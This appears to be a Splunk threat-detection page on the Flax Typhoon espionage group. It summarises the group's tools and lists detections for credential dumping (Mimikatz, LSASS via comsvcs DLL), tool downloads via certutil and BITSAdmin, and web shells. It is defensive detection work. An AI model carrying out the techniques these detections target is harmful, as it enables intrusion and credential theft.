Analytics Story: Flax Typhoon

Updated Date: 2026-05-13 ID: 78fadce9-a07f-4508-8d14-9b20052a62cc Author: Michael Haag, Splunk Product: Splunk Enterprise Security

Description

Microsoft has identified a nation-state activity group, Flax Typhoon, based in China, targeting Taiwanese organizations for espionage. The group maintains long-term access to networks with minimal use of malware, relying on built-in OS tools and benign software. The group's activities are primarily focused on Taiwan, but the techniques used could be easily reused in other operations outside the region. Microsoft has not observed Flax Typhoon using this access to conduct additional actions.

Why it matters

Flax Typhoon has been active since mid-2021, targeting government agencies, education, critical manufacturing, and IT organizations in Taiwan. The group uses the China Chopper web shell, Metasploit, Juicy Potato privilege escalation tool, Mimikatz, and SoftEther VPN client. However, they primarily rely on living-off-the-land techniques and hands-on-keyboard activity. Initial access is achieved by exploiting known vulnerabilities in public-facing servers and deploying web shells. Following initial access, Flax Typhoon uses command-line tools to establish persistent access over the remote desktop protocol, deploy a VPN connection to actor-controlled network infrastructure, and collect credentials from compromised systems. The group also uses this VPN access to scan for vulnerabilities on targeted systems and organizations from the compromised systems.

Detections

Name ▲▼	Technique ▲▼	Type ▲▼
Windows Mimikatz Binary Execution	OS Credential Dumping	TTP
Windows File Download Via CertUtil	Ingress Tool Transfer	TTP
Web or Application Server Spawning a Shell	External Remote Services, Exploit Public-Facing Application	TTP
Windows SQL Spawning CertUtil	Ingress Tool Transfer	TTP
Windows Suspicious Child Process Spawned From WebServer	Web Shell	Anomaly
Windows Service Created with Suspicious Service Name	Service Execution	Anomaly
Windows Service Created with Suspicious Service Path	Service Execution	TTP
Dump LSASS via comsvcs DLL	LSASS Memory	TTP
Windows SoftEther VPN Masquerading as Legitimate Binary	Masquerading, Protocol Tunneling	TTP
Overwriting Accessibility Binaries	Accessibility Features	TTP
PowerShell 4104 Hunting	PowerShell	Hunting
BITSAdmin Download File	Ingress Tool Transfer, BITS Jobs	TTP

Data Sources

Name ▲▼	Platform ▲▼	Sourcetype ▲▼	Source ▲▼
Windows Event Log Security 4688	Windows	`XmlWinEventLog`	`XmlWinEventLog:Security`
Sysmon EventID 1	Windows	`XmlWinEventLog`	`XmlWinEventLog:Microsoft-Windows-Sysmon/Operational`
CrowdStrike ProcessRollup2	Other	`crowdstrike:events:sensor`	`crowdstrike`
Cisco Network Visibility Module Flow Data	Network	`cisco:nvm:flowdata`	`not_applicable`
Sysmon for Linux EventID 1	Linux	`sysmon:linux`	`Syslog:Linux-Sysmon/Operational`
Windows Event Log System 7045	Windows	`XmlWinEventLog`	`XmlWinEventLog:System`
Sysmon EventID 11	Windows	`XmlWinEventLog`	`XmlWinEventLog:Microsoft-Windows-Sysmon/Operational`
Powershell Script Block Logging 4104	Windows	`XmlWinEventLog`	`XmlWinEventLog:Microsoft-Windows-PowerShell/Operational`

References

https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/

Source: GitHub | Version: 2